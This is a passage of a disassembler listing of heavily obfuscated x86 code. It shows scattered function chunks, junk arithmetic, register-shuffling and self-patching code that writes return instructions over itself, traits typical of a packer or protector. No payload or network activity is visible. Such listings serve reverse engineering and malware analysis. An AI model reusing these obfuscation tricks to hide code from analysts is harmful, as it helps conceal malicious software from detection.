; START	OF FUNCTION CHUNK FOR sub_43E1E9

loc_44D51A:				; CODE XREF: sub_43E1E9+30D1j
		jmp	loc_448DBE
; END OF FUNCTION CHUNK	FOR sub_43E1E9

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44D51F	proc near		; CODE XREF: sub_457F67:loc_43BC61p
					; sub_45219E:loc_448894p

var_B		= byte ptr -0Bh
var_A		= byte ptr -0Ah
var_9		= byte ptr -9
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E690 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00442F6E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447DF2 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044C1DE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044F9EA SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00450AC0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004534B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453B82 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045B3B7 SIZE 0000001B BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF4h
		mov	[ebp+var_8], edx
		jmp	loc_442F6E
sub_44D51F	endp

; ---------------------------------------------------------------------------

loc_44D52D:				; CODE XREF: y2kk37jd:0045019Bj
		mov	[ecx], edx
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_44D52F:				; CODE XREF: sub_44001E+10171j
		xor	eax, 43082086h
		jns	loc_441412

loc_44D53B:				; CODE XREF: y2kk37jd:00446C96j
		jmp	loc_45854F
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
		and	ebp, esi
		jmp	loc_44140A
; ---------------------------------------------------------------------------

loc_44D547:				; CODE XREF: y2kk37jd:0043C653j
		sbb	eax, 0A2B142B6h

; =============== S U B	R O U T	I N E =======================================



sub_44D54D	proc near		; CODE XREF: y2kk37jd:0044BAE8p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0045AF3F SIZE 00000008 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	edx, 2B089872h
		jmp	loc_45AF3F
sub_44D54D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44D55C:				; CODE XREF: sub_445226+230j
		jz	loc_44180E
		cmp	ecx, 531FAAD4h
		jmp	loc_448E3B
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_44D56D	proc near		; CODE XREF: y2kk37jd:0044DDCFj
					; sub_451E7E+8p
		xchg	esi, [esp+0]
		pop	esi
		add	eax, 45A9F530h
		mov	eax, [eax]
		push	eax
		push	0
sub_44D56D	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_445226

loc_44D57C:				; CODE XREF: sub_445226+DCA6j
		push	10h
		call	sub_44B03F
		jmp	loc_43CCC6
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_44D588	proc near		; CODE XREF: y2kk37jd:0043BBBAp
					; y2kk37jd:0045A9EFj
		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_44F3F5
		mov	eax, 99B20D50h
sub_44D588	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_448700

loc_44D596:				; CODE XREF: sub_448700+C810j
		call	sub_442C3E
		mov	ds:off_41E078, eax
		jmp	loc_4516F8
; END OF FUNCTION CHUNK	FOR sub_448700

; =============== S U B	R O U T	I N E =======================================



sub_44D5A6	proc near		; CODE XREF: y2kk37jd:00444AA8j
					; sub_4568B4+Ap

; FUNCTION CHUNK AT 0043FBE7 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044593B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00458722 SIZE 0000000E BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	0DE573CDBh
		pop	eax
		jmp	loc_458722
sub_44D5A6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44D5B5:				; CODE XREF: y2kk37jd:00458801j
		push	0F791E4DCh
		pop	eax
		and	eax, 9329ADDAh
		xor	eax, 7EB3124Bh
		sub	eax, 0F5FC0242h
		jmp	loc_45247B
; ---------------------------------------------------------------------------

loc_44D5D2:				; CODE XREF: y2kk37jd:00447B01j
					; DATA XREF: sub_448CAE-8362o
		xchg	eax, [esp]
		mov	edx, eax
		pop	eax
		xchg	edi, [esp]
		mov	ecx, edi
		xchg	ecx, [esp]
		mov	edi, ecx
		jmp	loc_448689
; ---------------------------------------------------------------------------

loc_44D5E7:				; CODE XREF: y2kk37jd:004567F8j
		jg	loc_443ABB

; =============== S U B	R O U T	I N E =======================================



sub_44D5ED	proc near		; CODE XREF: y2kk37jd:loc_449417p

; FUNCTION CHUNK AT 004533F6 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	eax, [ebp-8]
		mov	[ebp-24h], eax
		jmp	loc_4533F6
sub_44D5ED	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_44D5FC:				; CODE XREF: sub_44113A:loc_457C3Dj
		push	3DF51AE1h
		jmp	loc_44F5B3
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444693

loc_44D606:				; CODE XREF: sub_444693:loc_44651Fj
		xchg	edi, [esp-4+arg_0]
		jmp	loc_44C0C8
; END OF FUNCTION CHUNK	FOR sub_444693
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_44D60E:				; CODE XREF: y2kk37jd:loc_45673Cj
					; sub_4577FE:loc_45B63Dj
		lea	eax, loc_43FE71
		mov	byte ptr [eax],	0C3h
		jmp	loc_43FE71
; END OF FUNCTION CHUNK	FOR sub_4577FE

; =============== S U B	R O U T	I N E =======================================



sub_44D61C	proc near		; CODE XREF: sub_41A70B+132p
					; sub_44D61C+5j
					; DATA XREF: ...
		call	sub_452441
		jmp	ds:off_41E020
sub_44D61C	endp


; =============== S U B	R O U T	I N E =======================================



sub_44D627	proc near		; DATA XREF: sub_43B949+9o

; FUNCTION CHUNK AT 00445F3C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044645A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044BAED SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E730 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455B24 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004564A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004573CF SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045B0E7 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045BD47 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045C17F SIZE 0000000B BYTES

		call	sub_43BA66
		or	eax, eax
		jnz	loc_4592CE
		jmp	loc_445F3C
sub_44D627	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44D639:				; CODE XREF: y2kk37jd:0044A30Fj
		sub	ebx, 0EB9C88B7h
		and	ebx, 9986AC47h
		call	sub_44DBC7
; START	OF FUNCTION CHUNK FOR sub_45BB99

loc_44D64A:				; CODE XREF: y2kk37jd:loc_45176Ej
					; sub_45BB99-8BECj
		jmp	nullsub_484
; END OF FUNCTION CHUNK	FOR sub_45BB99
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C326

loc_44D64F:				; CODE XREF: sub_43C326+4j
		jmp	loc_45B6F5
; END OF FUNCTION CHUNK	FOR sub_43C326
; ---------------------------------------------------------------------------

loc_44D654:				; CODE XREF: y2kk37jd:00445BD8j
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_461
; ---------------------------------------------------------------------------
		call	nullsub_14
		jmp	ds:dword_41E0E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448512

loc_44D667:				; CODE XREF: sub_448512+12655j
		jmp	nullsub_348
; END OF FUNCTION CHUNK	FOR sub_448512
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44D66C:				; CODE XREF: sub_445226+11FA9j
		jmp	loc_455772
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_44D671:				; CODE XREF: sub_43F346+A22Aj
		jmp	loc_452D2F
; END OF FUNCTION CHUNK	FOR sub_43F346
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_14. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		jnz	loc_43B07C
		jmp	loc_457BB6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45709E

loc_44D682:				; CODE XREF: sub_45709E:loc_452651j
		pop	ebx
		xor	ebx, 0DE4D90BFh
		cmp	ebx, 6158B002h
		jmp	loc_44C11D
; END OF FUNCTION CHUNK	FOR sub_45709E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4480CB

loc_44D694:				; CODE XREF: sub_4480CB:loc_447074j
		add	eax, 0A98306D5h
		mov	eax, [eax]

loc_44D69C:				; CODE XREF: y2kk37jd:0043C843j
		push	ebp
		mov	ebp, eax
		call	sub_4507BF

loc_44D6A4:				; CODE XREF: y2kk37jd:00458B81j
		pop	ebx
; END OF FUNCTION CHUNK	FOR sub_4480CB

; =============== S U B	R O U T	I N E =======================================



sub_44D6A5	proc near		; CODE XREF: sub_4459CC+13520p

; FUNCTION CHUNK AT 004417C3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441F16 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004437AB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044935E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044C03D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044ED32 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00452E7A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00457119 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 004595B5 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045B56A SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	eax, [eax]
		jmp	loc_4437AB
sub_44D6A5	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44D6B0	proc near		; DATA XREF: sub_4507BF:loc_45C129o

; FUNCTION CHUNK AT 0044F520 SIZE 0000000B BYTES

		cmp	byte ptr [eax],	0F1h
		jnz	loc_445B67
		jmp	loc_44F520
sub_44D6B0	endp

; ---------------------------------------------------------------------------

loc_44D6BE:				; CODE XREF: y2kk37jd:0043C74Cj
		pop	eax

; =============== S U B	R O U T	I N E =======================================



sub_44D6BF	proc near		; CODE XREF: sub_43BF79+5p
					; y2kk37jd:loc_450D28j

; FUNCTION CHUNK AT 0043C5EA SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00443610 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DD74 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450169 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450A9F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045177C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004518F2 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00457BA3 SIZE 00000006 BYTES

		xchg	edi, [esp+0]
		pop	edi
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_44DD74
sub_44D6BF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44D6CC:				; CODE XREF: y2kk37jd:00445AC3j
		jz	loc_4422C8
		jmp	loc_44DC7F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_134. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4436E7

loc_44D6D8:				; CODE XREF: sub_4436E7+7C9Ej
		jmp	loc_44ACAE
; END OF FUNCTION CHUNK	FOR sub_4436E7
; ---------------------------------------------------------------------------

loc_44D6DD:				; CODE XREF: y2kk37jd:loc_4527E4j
		or	edx, 0C42F629Bh
		jnz	loc_451ED4
; START	OF FUNCTION CHUNK FOR sub_43E07B

loc_44D6E9:				; CODE XREF: sub_43E07B+Aj
		jmp	loc_44B433
; END OF FUNCTION CHUNK	FOR sub_43E07B
; ---------------------------------------------------------------------------
		jg	loc_44E57A
		xor	ebx, 77A7F106h
		js	loc_441672
		rol	ebx, 0Fh
		jmp	loc_451ED4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_44D708:				; CODE XREF: sub_445568+CE15j
		jz	loc_4464A3
		jmp	loc_43F8D8
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------

loc_44D713:				; CODE XREF: y2kk37jd:0044335Bj
		not	esi

; =============== S U B	R O U T	I N E =======================================



sub_44D715	proc near		; CODE XREF: sub_43F770+1BBE5p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00440846 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00456958 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	[edx], eax
		xchg	ecx, [esp+0]
		jmp	loc_456958
sub_44D715	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F9C

loc_44D723:				; CODE XREF: sub_442F9C+Bj
		push	7859ADE2h
		pop	ebx
		or	ebx, 19B4B013h
		jnz	loc_45B280
; END OF FUNCTION CHUNK	FOR sub_442F9C
; START	OF FUNCTION CHUNK FOR sub_44C4BC

loc_44D735:				; CODE XREF: sub_44C4BC-C21Fj
		jmp	loc_454A73
; END OF FUNCTION CHUNK	FOR sub_44C4BC
; ---------------------------------------------------------------------------
		and	edx, eax
		jmp	loc_45B27E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_147. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466E0

loc_44D742:				; CODE XREF: sub_4466E0-19C6j
		jmp	nullsub_350
; END OF FUNCTION CHUNK	FOR sub_4466E0
; ---------------------------------------------------------------------------

locret_44D747:				; CODE XREF: y2kk37jd:0045725Bj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45742F

loc_44D748:				; CODE XREF: sub_45742F-3A24j
		jz	loc_448E41
		jmp	loc_445454
; END OF FUNCTION CHUNK	FOR sub_45742F
; ---------------------------------------------------------------------------
		and	edx, esi
		jmp	sub_45136B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4488AC

loc_44D75A:				; CODE XREF: sub_4488AC+6j
		mov	ebx, esi
		pop	esi
		mov	ds:dword_446E98, edx

loc_44D763:				; CODE XREF: y2kk37jd:0044E32Ej
					; sub_4568B4:loc_4568C3j
		xchg	eax, edx
		call	sub_440CD1
		jmp	nullsub_347
; END OF FUNCTION CHUNK	FOR sub_4488AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D5A

loc_44D76E:				; CODE XREF: sub_457D5A+12j
		jnz	loc_4451A6
		jmp	loc_4534BD
; END OF FUNCTION CHUNK	FOR sub_457D5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B0A5

loc_44D779:				; CODE XREF: sub_45B0A5:loc_45815Cj
		jnz	loc_450982
		jmp	loc_458AC9
; END OF FUNCTION CHUNK	FOR sub_45B0A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_44D784:				; CODE XREF: sub_449C4F:loc_4515A4j
		call	sub_441856
		cmp	eax, [ebp-0Ch]
		jnz	loc_4542AF
		jmp	loc_44150D
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4599BE

loc_44D797:				; CODE XREF: sub_4599BE:loc_44B0C5j
					; sub_4599BE-8420j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4455DD
		jmp	loc_43B9C3
; END OF FUNCTION CHUNK	FOR sub_4599BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44D7A8:				; CODE XREF: sub_4458DD:loc_43D667j
		jz	loc_44E21D

loc_44D7AE:				; CODE XREF: sub_44023C+18356j
		jmp	loc_448AD8
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_44D7B3:				; CODE XREF: sub_445787+2779j
		jmp	loc_44450B
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
		add	edx, eax
		jmp	loc_44E215
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_44D7BF:				; CODE XREF: sub_454C24:loc_4456CDj
					; sub_454C24+2A24j
		add	eax, edx
		xor	eax, ebx
		add	eax, ecx
		xor	eax, esi
		jmp	loc_444E32
; END OF FUNCTION CHUNK	FOR sub_454C24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CB02

loc_44D7CC:				; CODE XREF: sub_43CB02:loc_44C32Dj
		pop	esi
		add	esi, 33FF8893h
		test	esi, 10h
		jmp	loc_451F45
; END OF FUNCTION CHUNK	FOR sub_43CB02
; ---------------------------------------------------------------------------
		mov	ebx, 0E80476A4h
		add	eax, esi
		jmp	sub_459672
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AD49

loc_44D7EA:				; CODE XREF: sub_44AD49:loc_4479F6j
		rol	ebx, 4
		add	ebx, 9FA92143h
		xchg	ebx, [esp+0]
		pushf
		jmp	loc_43BE9F
; END OF FUNCTION CHUNK	FOR sub_44AD49
; ---------------------------------------------------------------------------
		mov	eax, edi
		jbe	loc_452416
		jmp	sub_447E3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B2EB

loc_44D809:				; CODE XREF: sub_43B2EB:loc_45C70Aj
		push	eax
		call	sub_4526B7
		retn
; END OF FUNCTION CHUNK	FOR sub_43B2EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_44D810:				; CODE XREF: y2kk37jd:loc_44389Cj
					; sub_45B7AA:loc_45B80Dj
		push	ecx
		mov	ecx, ebp
		xchg	ecx, [esp+4+var_4]
		mov	ebp, esp
		push	edx
		jmp	loc_43D943
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
		add	ebp, 6BF62BFAh
		jmp	sub_44516F
; ---------------------------------------------------------------------------

loc_44D829:				; CODE XREF: y2kk37jd:00443F9Cj
		jz	loc_450B72
		jmp	loc_44EDBD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C4BC

loc_44D834:				; CODE XREF: sub_44C4BC+9C5Ej
		jz	loc_441388
		add	esi, 1AD88CB6h
		jmp	loc_44137C
; END OF FUNCTION CHUNK	FOR sub_44C4BC
; ---------------------------------------------------------------------------

loc_44D845:				; CODE XREF: y2kk37jd:loc_441D6Ej
		push	edx
		call	sub_43D8D9
; START	OF FUNCTION CHUNK FOR sub_45B491

loc_44D84B:				; CODE XREF: sub_45B491:loc_43FC1Ej
		jz	loc_44D331
		jmp	loc_43F87B
; END OF FUNCTION CHUNK	FOR sub_45B491
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B47E

loc_44D856:				; CODE XREF: sub_44B47E:loc_448334j
		jz	loc_451C71
		mov	eax, [ebp-4]
		call	sub_45598E
		mov	eax, 205AA81Dh
		push	offset loc_44F1A1
		jmp	loc_44C4FB
; END OF FUNCTION CHUNK	FOR sub_44B47E
; ---------------------------------------------------------------------------

loc_44D873:				; CODE XREF: y2kk37jd:00449405j
		js	loc_44E2EF
		jns	loc_44256B
		or	edx, esi
		pushf
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_44D882:				; CODE XREF: sub_43C865:loc_45283Fj
		xor	ecx, 0DAA468FDh

loc_44D888:				; CODE XREF: y2kk37jd:loc_459D87j
		xor	eax, ecx
		pop	ecx
		jmp	loc_44F8D4
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ADEC

loc_44D890:				; CODE XREF: sub_45ADEC:loc_4481EAj
		jz	loc_459F87
		jmp	loc_446665
; END OF FUNCTION CHUNK	FOR sub_45ADEC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_44D89B:				; CODE XREF: sub_448DCA-D30Dj
		jz	sub_45801A

loc_44D8A1:				; CODE XREF: sub_448DCA:loc_45408Dj
		push	0

loc_44D8A3:				; CODE XREF: sub_4458DD-298j
		push	0
		jmp	loc_43ED5B
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_44D8AA:				; CODE XREF: sub_4507BF:loc_4583B4j
		cmp	dword ptr [ebp-10Ch], 6D676552h
		jnz	loc_44C72F
		jmp	loc_43E5F2
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44D8BF:				; CODE XREF: sub_445226:loc_4406B3j
		push	esi
; END OF FUNCTION CHUNK	FOR sub_445226
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_44D8C0:				; CODE XREF: sub_43F911:loc_4494D1j
		sub	edi, eax
		jmp	loc_4557AA
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
		xchg	esi, ecx
		jmp	sub_446052

; =============== S U B	R O U T	I N E =======================================



sub_44D8CE	proc near		; CODE XREF: y2kk37jd:loc_44E490p
					; y2kk37jd:0044E9D3j

; FUNCTION CHUNK AT 0043B3F6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004550B8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045B444 SIZE 00000015 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	edi
		mov	edi, edx
		jmp	loc_45B444
sub_44D8CE	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E389

loc_44D8DA:				; CODE XREF: sub_43E389:loc_43D657j
		mov	edi, ebx
		xchg	edi, [esp+0]
		push	83730FAFh
		xchg	edi, [esp+4+var_4]
		mov	ebx, edi
		pop	edi
		and	ebx, 0CAF88541h
		add	ebx, 7DD4A029h
		jmp	loc_441AE9
; END OF FUNCTION CHUNK	FOR sub_43E389
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440D56

loc_44D8FB:				; CODE XREF: sub_440D56+Ej
		jnz	loc_44356C
		jmp	loc_441FE2
; END OF FUNCTION CHUNK	FOR sub_440D56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44D906:				; CODE XREF: sub_445226:loc_443CEAj
		pop	edx
		jmp	loc_44F183
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4492F7

loc_44D90C:				; CODE XREF: sub_4492F7-569Bj
		jno	loc_43E332
		shr	ebx, 13h
; END OF FUNCTION CHUNK	FOR sub_4492F7
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_44D915:				; CODE XREF: sub_45B7AA-1B279j
					; sub_4492F7:loc_442FE4j ...
		jnb	loc_43DD9F
		push	eax
		push	0B63AB08Ch
		pop	eax
		jmp	loc_449E11
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------

loc_44D927:				; CODE XREF: y2kk37jd:00446BE6j
		popf
		add	ebp, eax
		sub	eax, 2829C251h
		jmp	loc_45A802

; =============== S U B	R O U T	I N E =======================================



sub_44D935	proc near		; CODE XREF: y2kk37jd:0044FAE1j
					; sub_44803E+12BD9p
		xchg	ebx, [esp+0]
		pop	ebx
		push	5375E850h
		pop	edi
		and	edi, 0D5061DC6h
		xor	edi, 0E00EBE26h
		add	edi, 4EF5499Eh
		jmp	loc_445746
sub_44D935	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44D956:				; CODE XREF: y2kk37jd:004562ADj
		or	edi, edx
		xor	eax, edx
		popf
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_44D95B:				; CODE XREF: sub_44AAA1:loc_456297j
		add	edi, 0F43BB7CFh
		jmp	loc_453AC7
; END OF FUNCTION CHUNK	FOR sub_44AAA1
; ---------------------------------------------------------------------------

locret_44D966:				; CODE XREF: y2kk37jd:loc_452957j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443360

loc_44D967:				; CODE XREF: sub_443360+446j
		jmp	loc_4558DC
; END OF FUNCTION CHUNK	FOR sub_443360
; ---------------------------------------------------------------------------

loc_44D96C:				; CODE XREF: y2kk37jd:loc_445960j
		sub	ebp, 24A9489Fh
		mov	esi, 19620307h
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44D977:				; CODE XREF: sub_445226:loc_4454AEj
		sub	esi, ecx
		jmp	loc_4478E7
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EF0D

loc_44D97E:				; CODE XREF: sub_44EF0D+5j
		call	sub_43BB6F

loc_44D983:				; DATA XREF: sub_440753+16o
		mov	ds:off_41E174, eax
		lea	eax, sub_4468E0
		mov	byte ptr [eax],	0C3h
		jmp	loc_44AD80
; END OF FUNCTION CHUNK	FOR sub_44EF0D

; =============== S U B	R O U T	I N E =======================================



sub_44D997	proc near		; DATA XREF: .data:off_42816Co
		call	nullsub_15
		jmp	ds:dword_41E178
sub_44D997	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454539

loc_44D9A2:				; CODE XREF: sub_454539+3FD7j
		jmp	nullsub_245
; END OF FUNCTION CHUNK	FOR sub_454539
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_44D9A7:				; CODE XREF: sub_44001E+1F5j
		jmp	loc_43B5F2
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E9A8

loc_44D9AC:				; CODE XREF: sub_44E9A8-F451j
		jmp	locret_44551C
; END OF FUNCTION CHUNK	FOR sub_44E9A8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_15. PRESS	KEYPAD "+" TO EXPAND]
		dw 9B84h
		dd 68FFFF58h, 4546F3h, 0B896E9h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447FB4

loc_44D9C1:				; CODE XREF: sub_447FB4+13BBEj
		mov	byte ptr [eax],	0C3h
		jmp	sub_442F52
; END OF FUNCTION CHUNK	FOR sub_447FB4
; ---------------------------------------------------------------------------
		call	nullsub_480
		jmp	ds:dword_41E130
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_480. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		test	[esi+5A0000ECh], ebp
		mov	eax, [esp]
		jmp	loc_454E58
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44594E

loc_44D9E3:				; CODE XREF: sub_44594E-622Bj
					; sub_456A36:loc_4474D7j
		push	14E84D78h
		pop	eax
		sub	eax, 5E75496Bh
		xor	eax, 1664D618h
		test	eax, 40h

loc_44D9FB:				; CODE XREF: sub_445226:loc_450702j
		jmp	loc_44F8AD
; END OF FUNCTION CHUNK	FOR sub_44594E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F9C

loc_44DA00:				; CODE XREF: sub_442F9C+182F6j
		xchg	ebx, [ebp+0]
		shr	edx, 1Eh
		cmp	eax, 0BA117CD2h
		jmp	loc_44337F
; END OF FUNCTION CHUNK	FOR sub_442F9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_44DA11:				; CODE XREF: sub_43BD0D+12D4Aj
		or	ecx, ds:4000ECh
		add	ecx, 20B0557Eh
		test	ecx, 200000h
		jmp	loc_4475B5
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DED9

loc_44DA28:				; CODE XREF: sub_44DED9-71ABj
		jnz	loc_443922
		jmp	loc_445DD4
; END OF FUNCTION CHUNK	FOR sub_44DED9
; ---------------------------------------------------------------------------

locret_44DA33:				; CODE XREF: y2kk37jd:0044C8DEj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_44DA34:				; CODE XREF: sub_43ED19+119Fj
		jmp	loc_4464D4
; END OF FUNCTION CHUNK	FOR sub_43ED19
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_93. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4581BB

loc_44DA3A:				; CODE XREF: sub_4581BB+8j
		jmp	nullsub_242
; END OF FUNCTION CHUNK	FOR sub_4581BB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459789

loc_44DA3F:				; CODE XREF: sub_459789-7CABj
		jmp	loc_44F4F0
; END OF FUNCTION CHUNK	FOR sub_459789
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454539

